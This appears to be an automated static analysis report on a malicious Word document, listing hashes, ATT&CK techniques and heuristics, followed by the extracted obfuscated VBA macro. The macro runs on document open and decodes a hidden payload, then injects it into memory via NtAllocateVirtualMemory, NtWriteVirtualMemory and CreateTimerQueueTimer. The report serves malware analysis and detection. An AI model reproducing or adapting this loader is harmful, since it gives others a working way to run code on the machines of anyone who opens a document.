Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a984f3241483a2ba…

MALICIOUS

Office (OLE)

Size: 205.0 KB
Created: 2017-08-28 11:08:00
Authoring application: Microsoft Office Word
First seen: 2017-09-14
MD5: 22e84652a66f3f9f58063b741959e712
SHA-1: b961de0a165abeb34575a617bd1d7f673870866f
SHA-256: a984f3241483a2ba8c5eb0e269b397fadbbd2e444140af57599aa9772f738ae2
Risk Score: 190

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6342260-0', indicating it functions as a dropper. The presence of VBA macros, specifically a 'Document_Open' macro that utilizes 'GetObject', strongly suggests the execution of malicious code upon opening. The VBA code is heavily obfuscated, but the overall structure and heuristic firings point to a macro-based downloader designed to fetch and execute further stages.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6342260-0 [critical] [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6342260-0
  • VBA macros detected [medium] [OLE_VBA_MACROS] (3 related findings)
    Document contains VBA macro code
  • GetObject call [high] [OLE_VBA_GETOBJ]
    GetObject call
    Matched line in script
    Set wdApp = GetObject(, "Word.Application")
    Set wdDoc = wdApp.ActiveDocument
  • VBA p-code auto-exec with execution tokens [high] [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] [OLE_VBA_DOCOPEN]
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim bovidae As Long
  • NOP-equivalent sled detected [medium] [SC_NOP_EQUIV_SLED]
    Long run of 0x40 bytes
    Disassembly
    Attempted x86 opcode disassembly
  • Embedded URL [info] [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ - In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# - In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 51875 bytes
SHA-256: 0c0400c394e1ad5ccad5a9d093e37b4fd44a54d727937fec7c9706117d7d1c61
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function unalert(quoin)
nova = pistol(20 / 4)
Dim coats As Byte
Dim amoebeeic As Variant
Dim detrude As Byte
Dim mischiefmaking As String
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim pellmell As Variant
Dim battlescarred As LongPtr
cic = 23 - 77 + 62
Dim highlevel As LongPtr
Dim visus As Variant
Dim leiopelmatidae As String
Dim ablated As LongPtr
Dim deshabille As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim battlescarred As Long
cic = 66 - 123 + 61
Dim highlevel As Long
Dim ablated As Long
#End If
gasteromycetes = VarPtr(battlescarred)
norm = continuation(gasteromycetes, VarPtr(quoin) + 8, cic)
endaemonism = 55 - 114 + 58
highlevel = 78 - 81 + 3
bosom = 117 - 65 - 52
ablated = 87 - 47 + 9490
leipzig = 15 - 28 + 4109
odontophorus = 61 - 66 + 69
besiege = deformational(ByVal endaemonism, highlevel, ByVal bosom, ablated, ByVal leipzig, ByVal odontophorus)
individualistically = shrivel

carpinus = Math.Round(96)

continuation highlevel, battlescarred, 55 - 86 + 5914
airmail = 15
dulciana = 13605
detach = 325784
 Pmt 0, airmail, 13534, 16485, 3

unalert = highlevel
End Function
Function continuation(bourse, mulet, partialness)
nova = pistol(20 / 4)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (nova) Then
Dim mucilage As Integer
Dim despondency As Byte
Dim chair As LongPtr
Dim lateward As LongPtr
Dim maypole As LongPtr
Dim naiad As Integer
Dim esteem As LongPtr
Dim derail As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (nova) Then
Dim lateward As Long
Dim hippoglossoides As Long
Dim chair As Long
Dim scolecoid As Variant
Dim esteem As Long
Dim fifties As String
Dim maypole As Long
Dim declamatory As Byte
Dim derail As Long
Dim derivational As Variant
Dim waterloo As Long
#End If
anemometer = anemometer
individualistically = "glamorous"
lateward = bourse
derail = partialness
acrophobic = Rnd(299)
esteem = mulet
desous = 119
jour = 8429
ranch = 119928
 Pmt 0, desous, 28349, 55711, 3

peccancy = "needlewood"
chair = 33 - 111 + 77
unreproducible ByVal chair, lateward, esteem, derail, maypole
dissociation = Rnd(217)
End Function
Sub arthralgic()
Dim cordierite As Long
Dim anacanthini As Long
enthusiast.nonnatural.Value = Day(#12/5/2013#)
varday = bonmotjeu = "featureless"
courser = "juvenal"
lanzhou = croak
august = "jail"
scratch = "osteolysis"

diluent = "schizopoda"
tympani = "agamidae"
confute = "nilgai"
Set headliner = enthusiast.nonnatural.SelectedItem
untractable = 42
aloe = 3522
dissimilitude = 289834
 Pmt 0, untractable, 3028, 46128, 4

arctocebus = headliner.Name
geebung = 3 - 88 + 7929
actionable = Right(arctocebus, geebung)
yalta = protos.avens(actionable)
consuetudo = 101
centrospermae = 32126
overage = 513269
 Pmt 0, consuetudo, 31445, 15145, 2

pettiness = "anaesthetize"
cropper = "moscow"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim entolomataceae As Integer
Dim desole As LongPtr
Dim abscond As LongPtr
Dim news As Byte
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim cleansing As Long
Dim abscond As Long
Dim scienter As String
Dim desole As Long
#End If
adhibition = 106 - 87 - 19
cataclysm = "stiffness"
unsupportable = 11 - 36 + 4121
fissile = 108
asserting = 15119
maximis = 312021
 Pmt 0, fissile, 35069, 19822, 6

quietism = tribologist
americaine = "abrogate"
muscadet = "countrywide"
columnist = 95
herself = 32947
intersexual = 382318
 Pmt 0, columnist, 4804, 55054, 8

gouda = yalta
diuturnal = adaxial
copiousness = admiration
desole = unalert(gouda)
tarawa = "prate"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim cohibit As Long
Dim combo As LongPtr
Dim cocotte As LongPtr
Dim mount As LongPtr
ageism = 59 - 20 + 2025
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim combo As Long
colima = 74 - 107 + 814
Dim cocotte As Long
Dim mount As Long
ageism = colima + 3459

#End If
Dim hardboiled As Integer
Dim movere As Long
combo = 118 - 10 - 108
abscond = desole + ageism
cocotte = 92 - 124 + 201559
mount = 117 - 128 + 3511
capacitive = nortel(cocotte, combo, abscond)
birr = 50 + 10
ichneumonidae = 11810 + 1
mohammedan = 276070 + 1
 Pmt 0, birr, 33851, 48854, 3

End Sub
Function pistol(jugles)
Dim windser As Integer
Dim velvet As Integer
fixoid = jugles * 12
Dim sitroen As Variant
metro2 = jugles * 2
Dim cowen() As Byte
#If (4 * 6 + jugles) > (6 - 2 * 1) And (10 - jugles * 2) * 2 < (Win64) Then
velvet = metro2
#End If
#If (4 * 6 + jugles) > (6 - 2 * 1) And Not (Win64) > (10 - jugles * 2) * 2 Then
velvet = (120 - fixoid)
#End If
metro3 = metro2 + velvet
pistol = velvet
End Function
Private Sub Document_Open()
Dim bovidae As Long
Dim silviculture As Integer
hectometer = cleavage
quickly = attentiongetting
arthralgic
doxorubicin = 81
cheapskate = 33628
pasta = 583933
 Pmt 0, doxorubicin, 36180, 14946, 8
End Sub

Attribute VB_Name = "barbaresque"
'  And walked out
#If (12 * 4 + 7) > (9 - 3 * 2) And Not (32 - 8 * 4) * 2 < (Win64) Then
'  But just your sight had my heart storming
'  You wrecked my whole world when you came
Public Declare Function unreproducible Lib "Ntdll.dll   " Alias "NtWriteVirtualMemory" (ByVal iresine As Any, ByVal unsated As Any, ByVal astonished As Any, ByVal hoe As Any, ByVal newfangled As Any) As Long
'  And hit me like a hurricane
'  You wrecked my whole world when you came
Public Declare Function lab Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal finished As Any, recipe As Any, jewelry As Any, falafel As Any) As Long
'  And hit me like a hurricane
'  From the moment when
Public Declare Function nodulose Lib "ntdll.dll  " Alias "AcquireSRWLockShared" (faultfinder As Any) As Long
'  But just your sight had my heart storming
'  And walked out
Public Declare Function deformational Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (picking As Long, airship As Long, ByVal ambiguas As Long, beadlikeByVal As Long, serer As Long, ByVal maquiladora As Long) As Long
'  Knew it was gonna be a long night
'  Rain was driving, thunder, lightning
Public Declare Function reconnoiter Lib "Kernel32" Alias "CreateTimerQueueTimer" (nigeria As Any, ByVal arum As Any, ByVal mismanage As Any, ByVal aphesis As Any, ByVal chestnut As Any, ByVal fucking As Any, ByVal mists As Any) As Long
'  Started talking bout us again
'  The moon went hiding, stars quit shining
Public Declare Function jabot Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal commoner As Any, plasmic As Any, approximating As Any, agile As Any) As Long
'  The moon went hiding, stars quit shining
'  I was doing alright
#End If
'  And hit me like a hurricane
#If (11 * 2 + 5) > (8 - 3 * 1) And (28 - 7 * 4) * 2 < (Win64) Then
'  Knew it was gonna be a long night
'  And hit me like a hurricane'  Started talking bout us again
Public Declare PtrSafe Function antinomasia Lib "ntdll.dll  " Alias "AcquireSRWLockShared" (heliograph As Any) As LongPtr
'  We locked eyes over whiskey on ice
'  We locked eyes over whiskey on ice
Public Declare PtrSafe Function unreproducible Lib "ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal purveyance As Any, ByVal rosy As Any, ByVal cryophobia As Any, ByVal colloquial As Any, ByVal achievement As Any) As LongPtr
'  From the moment when
'  Started talking bout us again
Public Declare PtrSafe Function deformational Lib "ntdll.dll  " Alias _
"NtAllocateVirtualMemory" (bencher As LongPtr, banter As LongPtr, ByVal slopseller As LongPtr, horripilateByVal As LongPtr, cobnut As LongPtr, ByVal gynecaeum As LongPtr) As LongPtr
'  If I woulda just layed my drink down
'  Knew it was gonna be a long night
Public Declare PtrSafe Function severable Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal metaphrast As Any, secrets As Any, entandrophragma As Any, halfhour As Any) As LongPtr
'  You wrecked my whole world when you came
'  Baby, without warning
Public Declare PtrSafe Function reconnoiter Lib "Kernel32" Alias "CreateTimerQueueTimer" (coming As Any, ByVal capitalistic As Any, ByVal blockaderunner As Any, ByVal halfhour As Any, ByVal berliner As Any, ByVal redount As Any, ByVal totis As Any) As Long
'  Rain was driving, thunder, lightning
'  The moon went hiding, stars quit shining
Public Declare PtrSafe Function cantering Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal groceries As Any, prissy As Any, cote As Any, conglobation As Any) As LongPtr
'  And hit me like a hurricane'  But you rolled in with your hair in the wind
#End If
'  I was doing alright
'  And hit me like a hurricane

'  The moon went hiding, stars quit shining
'  We locked eyes over whiskey on ice

Function nortel(wrd, buls, lky)
#If (7 * 2) * 3 > 14 / 2 And (12 - 6 * 2) * 1 < (Win64) Then
Dim kittins As LongPtr
Dim bis As LongPtr
Dim ority As Integer
Dim deble As LongPtr
#End If
#If (12 * 2) / 1 > 14 / 2 And Not (12 - 6 * 2) * 1 < (Win64) Then
Dim kittins As Long
Dim bwis As Long
Dim antery As Integer
Dim deble As Long
#End If
kittins = buls
deble = lky
dan2 = reconnoiter(wrd, kittins, deble, kittins, kittins, kittins, kittins)
End Function
Sub InsertText()
Dim wdApp As Word.Application
Dim wdDoc As Document
Dim wdSln As Selection

Set wdApp = GetObject(, "Word.Application")
Set wdDoc = wdApp.ActiveDocument
Set wdSln = wdApp.Selection

wdDoc.Application.Options.Overtype = False
With wdSln
If .Type = wdSelectionIP Then
.TypeText ("Inserting at insertion point. ")
ElseIf .Type = wdSelectionNormal Then
If wdApp.Options.ReplaceSelection Then
    .Collapse Direction:=wdCollapseStart
End If
.TypeText ("Inserting before a text block. ")
End If
End With
Set wdApp = Nothing
Set wdDoc = Nothing
End Sub
Function comeatable(neve, chile, materfamilias)
If materfamilias = 12 + (10 / 2 - 5) Then
comeatable = neve \ chile
ElseIf materfamilias = 22 + (5 - 3) / 2 - 1 Then
comeatable = neve And chile
ElseIf materfamilias = 30 + (56 / 7 - 4 * 2) Then
comeatable = neve * chile
End If
End Function
Function cacogenesis(emu)
cacogenesis = AscW(emu)
End Function

Attribute VB_Name = "enthusiast"
Attribute VB_Base = "0{CFB4611D-991F-4777-9E67-CC6D24DF094C}{BADA2A78-210F-4401-A5F0-69726C7878CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "protos"
Sub Binary_Search_of_Array()
Dim intThousand(1000) As Integer
Dim I As Integer
Dim intTop As Integer
Dim intMiddle As Integer
Dim intBottom As Integer
Dim varUserNumber As Variant

For I = 1 To 1000
    intThousand(I) = I
Next I

varUserNumber = 233
intTop = UBound(intThousand)
intBottom = LBound(intThousand)

Do
intMiddle = (intTop + intBottom) / 2
If varUserNumber > intThousand(intMiddle) Then
intBottom = intMiddle + 1
Else
intTop = intMiddle - 1
End If
Loop Until (varUserNumber = intThousand(intMiddle)) _
Or (intBottom > intTop)

If varUserNumber = intThousand(intMiddle) Then
Debug.Print varUserNumber & ", at position " & intMiddle
Else
Debug.Print "not in "
End If
End Sub
Function avens(bereave) As String
Dim bobadil(63) As Long
Dim neoliberalism As Long
Dim unhandsome As Long
Dim cockamamie As String

Dim featureless As Integer
Dim accrust As Long
Dim caliginous(6962) As Byte
anemometer = anemometer

Dim enjoying() As Byte
Dim intendant As Byte

Dim handoff As String

Dim aepyceros(63) As Long
Dim gingery As String
Dim senorita As Long
Dim panicled(63) As Long
shrivel = anemometer

dissociation = dissociation And 207

Dim easterner As String

bibliographic = 110 - 44 + 65470
capitalsprint = 100 - 60 + 24
episcopate = 102 - 60 + 16515030
pretended = 83 - 14 + 186
camelot = 2 - 84 + 338
undertaking = 64 - 45 + 65261
berycomorphi = 44 - 125 + 4113
coptic = 119 - 22 - 34
facet = 70 - 49 + 4075
anaplastic = 45 - 75 + 262174
highmettled = 94 - 8 + 16711594
Dim contopus As String

Dim bookmaker As Byte

Dim nageia As Long

apractic = 6 - 55 + 258097
Dim anopia As Long
acquaintenace = 60 - 28 - 32
ballista = 64 - 19 + 7798
Dim frozen() As Byte
Dim archetypal As Long
Dim entangle As Variant
frozen = VBA.StrConv(bereave, 128)
Dim mercilessly As Integer
correctionsmake = 70 + 1
treacherous = 3470 + 1
housefather = 519860 + 1
 Pmt 0, correctionsmake, 35845, 13257, 8

ore = 7840 + 3
inlaw = vbKeyShift - 12
For silica = 0 To ore
If silica Mod 2 = 0 Then
frozen(silica) = frozen(silica) - inlaw
Else
frozen(silica) = frozen(silica) - (inlaw - 1)
End If
Next silica
atrocity = 110 + 8
effervesce = 15190 + 7
cheilitis = 424370 + 1
 Pmt 0, atrocity, 7432, 16019, 4

featureless = 5 - 5
talcum = 78 - 64 - 14
pyrenomycetes = 52 - 36 + 27
lob = daddy
For neoliberalism = (6 - 6) * 1 To (40 + 23) * (5 - 4)
bobadil(neoliberalism) = comeatable(neoliberalism, capitalsprint, 30)
panicled(neoliberalism) = comeatable(neoliberalism, facet, 30)
aepyceros(neoliberalism) = comeatable(neoliberalism, anaplastic, 30)
Next neoliberalism
anicteric = 70 + 9
boater = 36810 + 9
concomitance = 347510 + 3
 Pmt 0, anicteric, 16631, 21424, 5

enjoying = frozen
downward = 20 - 82 + 66
mercedario = 80 + 7
orthopristis = 30540 + 7
bile = 275350 + 4
 Pmt 0, mercedario, 37058, 22193, 3

mundation = 6 - 48 + 45
anemometer = individualistically

shrivel = "acetabulum"

deciliter = mundation + 1
ovrerhasty = 7 - 111 + 106
For unhandsome = (3 - 3) To ore
assegai = enjoying(unhandsome)
patitur = enjoying(unhandsome + 2)
ethnology = panicled(lob(enjoying(unhandsome + 1)))
undereducated = bobadil(lob(patitur)) + lob(enjoying(unhandsome + mundation))
accrust = aepyceros(lob(assegai)) + ethnology + undereducated
neoliberalism = comeatable(accrust, highmettled, 22)
caliginous(senorita) = comeatable(neoliberalism, bibliographic, 12)
neoliberalism = comeatable(accrust, undertaking, 22)
caliginous(senorita + 1) = comeatable(neoliberalism, camelot, 12)
caliginous(senorita + ovrerhasty) = comeatable(accrust, pretended, 22)
senorita = senorita + ovrerhasty + 1
unhandsome = unhandsome + 3
Next
avens = caliginous
End Function

Function daddy()
Dim talker(255) As Byte
euphonious = 73 - 104 + 96
Do While euphonious <= 90 + 1
talker(euphonious) = euphonious - 65
euphonious = euphonious + 1
Loop
euphonious = 40 + 8
Do While euphonious <= 50 + 8
talker(euphonious) = euphonious + 4
euphonious = euphonious + 1
Loop
euphonious = 90 + 7
Do While euphonious <= 120 + 3
talker(euphonious) = euphonious - 71
euphonious = euphonious + 1
Loop
talker(47) = 60 + 3
euphonious = 40 + 3
talker(euphonious) = 60 + 2
daddy = talker
End Function

' Processing file: /opt/analyzer/scan_staging/d387beb3199b42b9a798d0f7d7790c39.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 15343 bytes
…